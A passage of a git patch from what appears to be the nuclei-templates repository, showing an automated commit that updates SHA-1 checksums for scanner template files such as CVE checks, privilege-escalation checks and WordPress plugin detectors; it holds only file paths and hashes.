"false" extractors: - type: dsl dsl: - '"AllowUsersToChangePassword Policy is not enabled in your AWS account"' -# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950 From 8eb6f640b520ad22133591986fa0a9a50ee47a4c Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 17 Oct 2024 01:50:57 +0000 Subject: [PATCH 183/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 437 +++++++++++++++++++++-------------------- 1 file changed, 219 insertions(+), 218 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ef359bb5dc..6d06a9041e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1,5 +1,6 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 -CONTRIBUTING.md:2a3eb51d00e6dc20f0d98db5996f905ca347d1ac +CONTRIBUTING.md:e4911616a6625b38c1a64c19e2a4dd0431977f57 +Community-Rewards-FAQ.md:3bd2cff9769ada78e90e864d5a14b7ce24987b1b LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 README.md:9fd622dcec4899ea5baa796f397b91f057e5ffa9 @@ -62,7 +63,7 @@ cloud/aws/iam/iam-password-policy.yaml:0c0198bd8d1a51bb19a33eaca3eb0e0084ddb229 cloud/aws/iam/iam-root-mfa.yaml:5b82c6ccd615779185fd186e0a7c0455c02340fc cloud/aws/iam/iam-ssh-keys-rotation.yaml:d3bb01e0e9eba3375cee6bf5bbde2c2b629b5cd3 cloud/aws/iam/iam-unapproved-policy.yaml:883cdcaea84c6970f6f99cc3289ffc2ed85bbac1 -cloud/aws/iam/iam-user-password-change.yaml:99ffdaecc6bb1aa4200a5853b703163276a1b2af +cloud/aws/iam/iam-user-password-change.yaml:125e3e600cb9aab43aec05161eac1d85816e42a6 cloud/aws/iam/ssl-cert-renewal.yaml:40622e59896e04627695c6d286e0015aaed13010 cloud/aws/rds/aurora-copy-tags-snap.yaml:9d0f7c95a0e76e441aa771fc7ee6c85a0f510736 cloud/aws/rds/aurora-delete-protect.yaml:4ff1aef5f611e5bdec4248c135e99db23c8c599e @@ -417,9 +418,9 @@ code/privilege-escalation/linux/rw-shadow.yaml:e9cc69616fbbda31ffe6fda74384f1308 code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd3eb92c98 code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 -contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:27f568daedd2ba953d36370fbe64c180fa3951ab -cves.json-checksum.txt:d6ac2d43af767410723bd9c2169d2ae9bb6168aa +contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a +cves.json:8f6a124dc64069cd9581783be5e2fcb6d45f0abd +cves.json-checksum.txt:776003c89c7f3e1694235967397f34ceb2891675 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -944,7 +945,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:9aff3c20ba6442ceb46269fcee helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:1375dc6042d338e0d6b89174d9c404b7ebdae9cd +helpers/wordpress/plugins/astra-sites.txt:344b5cffb3c634589e6cd6bc3a7f10de5354fa39 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:0f766def7495524760bb6627fe20754b1b42201b helpers/wordpress/plugins/backwpup.txt:e0fb471c746352b4fc815f1991c6bf1bc6acc985 @@ -987,7 +988,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/elementor.txt:392fc913b5d49fa4c70eee9f60fe33e9e2412040 -helpers/wordpress/plugins/elementskit-lite.txt:e533118608a55d6ab1d3699c600fc5c59213df36 +helpers/wordpress/plugins/elementskit-lite.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:304dfea8281c49f77ad7dfa2a904794d3b8ddaa1 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:89e9e8934da47fea559fb02759f5b3ba45efe5ca @@ -1032,7 +1033,7 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:b0dcf3b058d1447f7795e1 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a helpers/wordpress/plugins/jetpack.txt:686e3528babff806de1f1634899ad0543e550328 -helpers/wordpress/plugins/kadence-blocks.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 +helpers/wordpress/plugins/kadence-blocks.txt:f85383fcd7c211714084d7fca897998d7d759c5d helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:4b56d2dcd702b10856068019f6df67c19347a2b5 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:76c016796ebb68b3fe6dc70daa32bc4bec2ec367 @@ -1056,7 +1057,7 @@ helpers/wordpress/plugins/newsletter.txt:7997f017232e3787b80ece3766f88ed86b1ee1b helpers/wordpress/plugins/nextend-facebook-connect.txt:4ddf3a1e0a6b9d9c05f57b23f658e1113368aa4f helpers/wordpress/plugins/nextgen-gallery.txt:5d3c8a2aab67c1180ad6a53d03c70a9db8542e1a helpers/wordpress/plugins/ninja-forms.txt:470958dd9db82b472bd7ca29cb314b76859d78a9 -helpers/wordpress/plugins/ocean-extra.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f +helpers/wordpress/plugins/ocean-extra.txt:0c6799f2e85eccc7061443f76e45b7b268892b58 helpers/wordpress/plugins/official-facebook-pixel.txt:9a0a06f6eb18bf496057acce15162dc100f43480 helpers/wordpress/plugins/one-click-demo-import.txt:3a8e01bbd716628be7b89f1ec085442592846654 helpers/wordpress/plugins/optinmonster.txt:5d21a906e52ec03f80c5509bb9757af1612d0d0b @@ -1072,7 +1073,7 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/post-smtp.txt:c7fbb82e9737192fddd7338d925d8a95c11b44ac helpers/wordpress/plugins/post-types-order.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 -helpers/wordpress/plugins/premium-addons-for-elementor.txt:d3a18f41754a906f180d659ec261e2e069e25d38 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:e01682a590112864541b4a34a3482526a6b34801 helpers/wordpress/plugins/pretty-link.txt:f58e78c3747eb34e2ebd81c71131b52fedc0ddee helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 @@ -1081,7 +1082,7 @@ helpers/wordpress/plugins/redux-framework.txt:dfd43a95dc2d1f037030918b6e7e05f995 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/royal-elementor-addons.txt:dbd0f5b53be41557061859738dcb9a22b606797a helpers/wordpress/plugins/safe-svg.txt:b325dad6e19906442b1a3e9b23251c0f9c1a17d4 -helpers/wordpress/plugins/seo-by-rank-math.txt:475b3e822f3c131744c012140591d4ec98b83a63 +helpers/wordpress/plugins/seo-by-rank-math.txt:afb206dead2ee6d32eebe44832e256d3a616f88d helpers/wordpress/plugins/sg-cachepress.txt:167d57387dc73b3cb18e1a0f62fdf9a685582755 helpers/wordpress/plugins/sg-security.txt:3dc7615cff1b7eae4c7ab89f98d62c1ff780f179 helpers/wordpress/plugins/shortcodes-ultimate.txt:ab6eff81044890e13a67718890061695455a60df @@ -1124,7 +1125,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:689951386be6307f8517f9e3be818edaa6867ce0 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:22be3fc15650fdcc411faabdac240c396bd5f146 +helpers/wordpress/plugins/woocommerce-payments.txt:167529724ac20fabfa5e886f9bb50f1f655f98d7 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:b92754f576ff8ab413f69638772a7d4fb01e1de4 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:ff91f6a12c5b5d9b3000e730864aa8f2141aa975 helpers/wordpress/plugins/woocommerce-services.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 @@ -1137,7 +1138,7 @@ helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:ccefc2f8651dab1dca3f5569d5c8495d75f8956a helpers/wordpress/plugins/wp-file-manager.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 -helpers/wordpress/plugins/wp-google-maps.txt:7abf4deda3842d92ece171fc3e4f4d822495a725 +helpers/wordpress/plugins/wp-google-maps.txt:7cf0441f3b02f216d2a58fb4c7dba58924410a3f helpers/wordpress/plugins/wp-mail-logging.txt:8fd8331f772b1227e5913d3649cdb93d928aaebf helpers/wordpress/plugins/wp-mail-smtp.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca helpers/wordpress/plugins/wp-maintenance-mode.txt:b0f827f6588ea6305e79126fa44e3fda7f178356 @@ -3758,10 +3759,10 @@ http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:de0592811b331a6594fdf4e4b4f4539766ad0ade http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-32735.yaml:b6029c669edd7049a58dda3d4109055671c3b75d -http/cves/2024/CVE-2024-32736.yaml:ed4457088b5aaafba390a062f4f80ec1c09243d7 -http/cves/2024/CVE-2024-32737.yaml:e36fdcc812a79f8c3fd68df8dc3a08bdff9ef97b -http/cves/2024/CVE-2024-32738.yaml:3973d6794b7cfd951e9c6f2db0d0d65f345fa59a -http/cves/2024/CVE-2024-32739.yaml:442f2313d2e928a2c59d7eb9518852d9218d3505 +http/cves/2024/CVE-2024-32736.yaml:88d3a811c8d4b36873a4b3b08d176db69697df15 +http/cves/2024/CVE-2024-32737.yaml:0376a9ccafd9bbe05ffd2f35f1df3db5de6d9127 +http/cves/2024/CVE-2024-32738.yaml:152972f1a90f7e0fbcd2d7589de103299289a071 +http/cves/2024/CVE-2024-32739.yaml:060bdd3127ffe51653da4d88af0071995a15fb88 http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb @@ -3835,7 +3836,7 @@ http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 http/cves/2024/CVE-2024-45241.yaml:b32e4a46b08b7411b242362dafe333b209224ebb http/cves/2024/CVE-2024-45388.yaml:433afc604e847a5a8cc2d0d16687e3dce376a1c7 http/cves/2024/CVE-2024-45440.yaml:42079bcfe2123af3a6f602a0873e4ea18e363377 -http/cves/2024/CVE-2024-45488.yaml:bdef2670e4a81c4da4a74ad79b6311e4c6c9531d +http/cves/2024/CVE-2024-45488.yaml:e1a7fd8753131abe67ae2c9295bee18112b9a594 http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 @@ -7840,236 +7841,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ec4db3ed1695e1b027d729230186bf4b5fc11bb0 -http/technologies/wordpress/plugins/add-to-any.yaml:f2ef8ab53fd3fd5b87f12dc897d4d7172de6c53c -http/technologies/wordpress/plugins/admin-menu-editor.yaml:2c4449d4dadc26bb40b0d104d6b2dd6ba4b421c2 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:1d4dff47bf44bda0a0b5ce3b9e6c926265907d0c -http/technologies/wordpress/plugins/akismet.yaml:109a4c8b9612adc808074db0c8fa0a02cfafb1f0 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:de9606680255e11d11247c65d734d7cf12029fff -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c2852bf2a4a49b673981fa6bcdc898fd10f41888 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3303ac37f225a71a4a980106e6e4208db419a00a -http/technologies/wordpress/plugins/amp.yaml:badbc4684ed6c5cfe61855119dd317cb5c854185 -http/technologies/wordpress/plugins/antispam-bee.yaml:922bfd74018911f5cdef8d529d28fe0a2310e2c7 -http/technologies/wordpress/plugins/astra-sites.yaml:0df70bc2443e7fe0efbe6cad05723c1e4be13673 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:2aece994eaf7ec4150f0a08fa5e6aa52a7ae0e7d -http/technologies/wordpress/plugins/backwpup.yaml:524a5e642b693595666d51605ef7aeb9985216e9 -http/technologies/wordpress/plugins/better-search-replace.yaml:3fa7b08bad3a75237b1f81e98cd7423f5e239584 -http/technologies/wordpress/plugins/better-wp-security.yaml:85bdf68e5f5c6aac66cc7dd499aadb977db4c4b3 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4b824c6ead37432006c286b3ead42303641f6713 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:50ac8b0de217fa88f1bed1760431d48ff5787003 -http/technologies/wordpress/plugins/breeze.yaml:d8266ea3b0832742d7176ea6405f3b696f82aa50 -http/technologies/wordpress/plugins/broken-link-checker.yaml:31094793f1adc4447e12a418d1450e087ef2841e +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:f2b39df3db3290297e5ab240880e4db56064efbf -http/technologies/wordpress/plugins/child-theme-configurator.yaml:9111ba2081eec0430fae41438a2bc5eb4af41ed5 -http/technologies/wordpress/plugins/classic-editor.yaml:f2388ffcd352a68dae939a7b2d1dc3e29f9a73f2 -http/technologies/wordpress/plugins/classic-widgets.yaml:d9a338e4bee746189fb498289d33163de3cb709a -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:5ab50ca39ea4b066eb9af436d6d2b0691783c7ff +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:9407edaa76554117d08c24b64c7472d88175070e -http/technologies/wordpress/plugins/coblocks.yaml:da034e5d8c0c9d094131373999e64c548b820710 -http/technologies/wordpress/plugins/code-snippets.yaml:15c40c66811bc00d6f246d362d9c72cd08223046 -http/technologies/wordpress/plugins/coming-soon.yaml:cbd37b0d25bf8b8d755650325e37ad80787f9203 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:2126668a3f6c289359efae414662cacf8fafb930 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e221857041221f3784a6782739cbf886ab78fc79 -http/technologies/wordpress/plugins/contact-form-7.yaml:2551e3f06869d5a9d5b8a7d3f4a30b2638dac9e4 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1340f5484fb9adabb3ee662a006dc1c8bfad68fb -http/technologies/wordpress/plugins/cookie-law-info.yaml:8aedecd27a092c0d104e2f6aa13d32906daa067a -http/technologies/wordpress/plugins/cookie-notice.yaml:d186370e607312a7e41986edfa91287ef31f446e -http/technologies/wordpress/plugins/copy-delete-posts.yaml:5cdbdfa32e777c2106addaeaa9efb28ecaea58ae -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:dfb24a84d5302781867de4bd3fb9204972b03da8 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:059a41874ab73042696064e66b1f304c88d4b7e5 -http/technologies/wordpress/plugins/custom-css-js.yaml:a4497b88e57d74b6bd13592d3340d64459c4dd5f -http/technologies/wordpress/plugins/custom-fonts.yaml:81b6222f545992ccfe96c6332f374af93657d3a8 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f9acadcb8447ce89358390c31e0fb87e28fbb336 -http/technologies/wordpress/plugins/disable-comments.yaml:dca7f8758428eec996bb4fceb343735a5f1eef31 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:926d325df8e673f7e328d7061651718958686889 -http/technologies/wordpress/plugins/duplicate-page.yaml:9b23691a50f4568fc4bbd007a415c324e977f731 -http/technologies/wordpress/plugins/duplicate-post.yaml:c61762e842c563f33416e6537459bf70c3bd63de -http/technologies/wordpress/plugins/duplicator.yaml:314604474354b44a61d1592901cc189a176d93cd -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f7c3e5baf1d0488d4479e27539e99ace89b91499 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:a7997e826c46cfe3f15a7449e97a6124df0c833e -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:43e91d74bf8c3a8393d04851a844af2431bc9b7a -http/technologies/wordpress/plugins/elementor.yaml:19f42647b09bb8f3ef589b0909faa2a73f6a0cdf -http/technologies/wordpress/plugins/elementskit-lite.yaml:f08c4210589d9d0825e279395d2ed6e1dfc94cfe -http/technologies/wordpress/plugins/enable-media-replace.yaml:f9e36969096d90e62f5eac264d0e0660eeab844f -http/technologies/wordpress/plugins/envato-elements.yaml:7464ebb6668f551e7de1657693f092e7050f2509 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e2eb5c286dafa318dd734fb5fc3d8776f745b006 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:3b4cabc4b114f090fd7a38e0e45853e6f81aeb57 -http/technologies/wordpress/plugins/extendify.yaml:1d3356a02808f9da73bae126e733b2e279becbb0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:d82bac3bf0c5f8b436e78e0498f0f2d47bdcdfa6 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:9bd4bb2cfd625323423304019f202ec86c69dbe4 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:1b03fdaa48077fbabedd6f6064c6b19ab6bf92cb -http/technologies/wordpress/plugins/fluent-smtp.yaml:c7f2c4b8b1c94f00aea62606a8a2b87fad430443 -http/technologies/wordpress/plugins/fluentform.yaml:c3820805b10c48953b8720fbbf761ed42555c8fc -http/technologies/wordpress/plugins/font-awesome.yaml:ab1d650924ae347cc8e5edeccdc557819c25257d -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:97d3b7fe92f7e63546fb0d8a56904f474280652b -http/technologies/wordpress/plugins/formidable.yaml:2ec8741a793b6619336794b96c397ad560fe6946 -http/technologies/wordpress/plugins/forminator.yaml:fc65eabb99b3170f4d7cdf1f7843676903cea645 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:0aa9d294e064508cfa3d634acc837690109bd3c6 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:139f751f82a52f561b9690dc56792a654e5a6427 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 